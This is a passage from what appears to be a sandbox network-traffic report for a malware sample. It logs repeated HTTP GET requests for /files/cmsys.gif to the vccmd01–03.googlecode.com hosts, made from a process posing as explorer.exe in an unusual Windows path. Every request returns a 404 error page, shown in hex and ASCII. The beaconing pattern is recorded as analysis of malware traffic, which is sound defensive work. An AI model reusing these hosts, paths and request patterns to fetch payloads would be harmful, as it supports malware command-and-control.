                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.484258890 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    65192.168.2.56071364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:18.623883963 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.555627108 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:19 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.555813074 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    66192.168.2.560714108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.853446960 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:20.787034988 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:20 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:20.787050962 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    67192.168.2.560715142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:21.169687033 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.091247082 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:21 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.091296911 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    68192.168.2.56071764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:24.109265089 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:25.047210932 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:24 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:25.047245026 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    69192.168.2.560718108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:25.431072950 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:26.364764929 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:26 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:26.364810944 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    70192.168.2.560719142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:26.847755909 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:27.832818985 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:27 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:27.832858086 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:27.832915068 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    71192.168.2.56072164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:29.912938118 CET214OUTGET /files/cmsys.gif HTTP/1.1
